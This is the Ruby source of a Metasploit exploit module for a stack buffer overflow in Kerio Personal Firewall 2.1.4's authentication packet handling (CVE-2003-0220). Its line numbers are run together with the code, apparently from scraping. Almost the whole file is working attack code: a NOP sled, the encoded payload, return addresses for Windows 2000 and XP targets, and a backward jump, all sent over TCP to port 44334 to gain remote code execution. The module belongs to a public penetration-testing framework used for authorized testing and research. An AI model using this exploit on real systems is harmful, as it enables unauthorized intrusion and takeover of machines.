Path: blob/master/modules/exploits/windows/firewall/kerio_auth.rb
19664 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = AverageRanking78include Msf::Exploit::Remote::Tcp910def initialize(info = {})11super(12update_info(13info,14'Name' => 'Kerio Firewall 2.1.4 Authentication Packet Overflow',15'Description' => %q{16This module exploits a stack buffer overflow in Kerio Personal Firewall17administration authentication process. This module has only been tested18against Kerio Personal Firewall 2 (2.1.4).19},20'Author' => 'MC',21'License' => MSF_LICENSE,22'References' => [23['CVE', '2003-0220'],24['OSVDB', '6294'],25['BID', '7180']26],27'DefaultOptions' => {28'EXITFUNC' => 'process',29},30'Payload' => {31'Space' => 800,32'BadChars' => "\x00",33'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff",34},35'Platform' => 'win',36'Targets' => [37[ 'Windows 2000 Pro SP4 English', { 'Ret' => 0x7c2ec68b } ],38[ 'Windows XP Pro SP0 English', { 'Ret' => 0x77e3171b } ],39[ 'Windows XP Pro SP1 English', { 'Ret' => 0x77dc5527 } ],40],41'Privileged' => true,42'DisclosureDate' => '2003-04-28',43'DefaultTarget' => 0,44'Notes' => {45'Reliability' => UNKNOWN_RELIABILITY,46'Stability' => UNKNOWN_STABILITY,47'SideEffects' => UNKNOWN_SIDE_EFFECTS48}49)50)5152register_options(53[54Opt::RPORT(44334)55]56)57end5859def exploit60connect6162print_status("Trying target #{target.name}...")6364sploit = make_nops(4468) + payload.encoded65sploit << [target.ret].pack('V') + [0xe8, -850].pack('CV')6667sock.put(sploit)68sock.get_once(-1, 3)6970handler71disconnect72end73end747576